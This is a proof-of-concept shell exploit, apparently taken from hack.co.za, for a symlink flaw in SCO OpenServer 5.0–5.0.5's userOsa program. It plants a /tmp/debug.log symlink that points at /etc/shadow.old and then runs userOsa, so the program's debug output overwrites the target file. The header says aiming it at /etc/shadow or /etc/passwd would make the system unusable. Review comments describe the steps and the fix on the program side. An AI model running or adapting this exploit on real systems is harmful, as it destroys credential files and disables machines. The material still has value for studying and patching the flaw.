#!/bin/sh
#
# Under certain versions of SCO OpenServer there exists a
# symlink vulnerability which can be exploited to overwrite
# any file which is group writable by the 'auth' group.
#
# The problem in particular is in the
# /etc/sysadm.d/bin/userOsa executable. When given garbage
# output the program will write out a debug log. However,
# the program does not check to see if it is overwriting a
# currently existing file nor whether it is following a
# symlink. Therefore it is possible to overwrite files with
# debug data which are both in the 'auth' group and are
# writable by the same group. Both /etc/shadow & /etc/passwd
# fall into this category. If such an attack were launched
# against these files the system would be rendered unusable.
#
#                                         ..Brock Tellier
#
#    vulnerable: SCO Open Server 5.0 -> 5.0.5
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

# Proof-of-concept sequence for the symlink issue described in the header.
# Three steps, in order: change to /tmp, pre-create a symlink named
# debug.log, then run userOsa. Per the header, the program writes a debug
# log without checking for an existing file or a symlink, so the write is
# expected to land on the link target rather than on a fresh debug.log.
# Nothing here is checked for success (cd and ln can both fail silently
# under /bin/sh without set -e).
cd /tmp
# NOTE(review): the link target is /etc/shadow.old, not /etc/shadow or
# /etc/passwd as named in the header text; whether the write succeeds
# depends on that file being group-writable by 'auth', which this script
# does not verify.
ln -s /etc/shadow.old debug.log
# Invoked with no arguments. The header says the debug log is produced when
# the program is given garbage output; that it is written as ./debug.log in
# the current directory is presumably why the cwd is /tmp — not verifiable
# from this script alone. Program-side mitigation for this class of issue
# is to create log files with O_EXCL/O_NOFOLLOW (or equivalent) and never
# in a caller-controlled directory.
/etc/sysadm.d/bin/userOsa

#                     www.hack.co.za                     #